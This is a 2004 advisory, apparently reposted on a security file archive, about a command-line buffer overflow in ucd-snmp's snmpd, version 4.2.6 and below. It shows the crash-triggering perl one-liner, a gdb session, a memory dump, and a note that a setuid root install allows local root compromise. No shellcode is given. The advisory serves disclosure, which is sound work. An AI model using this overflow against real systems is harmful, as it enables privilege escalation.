snmpdadv.txt

snmpdadv.txt: Posted May 21, 2004; Authored by priestmaster | Site priestmaster.org; ucd-snmp versions 4.2.6 and below suffer from a buffer overflow on the command line when the daemon is spawned.; tags | advisory, overflow; SHA-256 | 24514b893dcbc9255cf0b3b4192324d7c0f00059646711e8fb3fc0a35111ed7c; Download | Favorite | View

snmpdadv.txt

---------- priestmasters UCD SNMP local buffer overflow advisorie -------------

Affected file: /usr/local/bin/snmpd
Version       : ucd-snmp <= 4.2.6  
Error class  : command line buffer overflow

It's possible to overflow a buffer, if we start it with a long string as
Argument after the -p switch.

- ./snmpd -p `perl -e 'print "A"x6700'`
- Segmentation fault

In gdb:

- (gdb) r -p `perl -e 'print "A"x6700'`
- The program being debugged has been started already.
- Start it from the beginning? (y or n) y

- Starting program: /usr/local/sbin/./snmpd -p `perl -e 'print "A"x6700'`

- Program received signal SIGSEGV, Segmentation fault.
- 0x804a2d6 in main (argc=1094795585, argv=0x41414141) at snmpd.c:453
- 453                 if (argv[arg][0] == '-') {

Buf is the overflowed buffer.

- (gdb) x/50x buf
- 0xbfffc4bc:     0x41414141      0x41414141      0x41414141      0x41414141
- 0xbfffc4cc:     0x41414141      0x41414141      0x41414141      0x41414141
- 0xbfffc4dc:     0x41414141      0x41414141      0x41414141      0x41414141
- 0xbfffc4ec:     0x41414141      0x41414141      0x41414141      0x41414141
- 0xbfffc4fc:     0x41414141      0x41414141      0x41414141      0x41414141
- 0xbfffc50c:     0x41414141      0x41414141      0x41414141      0x41414141
- 0xbfffc51c:     0x41414141      0x41414141      0x41414141      0x41414141
- 0xbfffc52c:     0x41414141      0x41414141      0x41414141      0x41414141
- 0xbfffc53c:     0x41414141      0x41414141      0x41414141      0x41414141
- 0xbfffc54c:     0x41414141      0x41414141      0x41414141      0x41414141
- 0xbfffc55c:     0x41414141      0x41414141      0x41414141      0x41414141
- 0xbfffc56c:     0x41414141      0x41414141      0x41414141      0x41414141
- 0xbfffc57c:     0x41414141      0x41414141

If snmpd is installed setuid root, it's possible to overwrite the
return address and jump to another location (shellcode) and launch
a setuid root shell (Local root compromise). 

If you have questions, mail me or visit my homepage.
<priest@priestmaster.org>
http://www.priestmaster.org

Happy hacking,

priestmaster

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

snmpdadv.txt

snmpdadv.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

snmpdadv.txt

Share This

snmpdadv.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems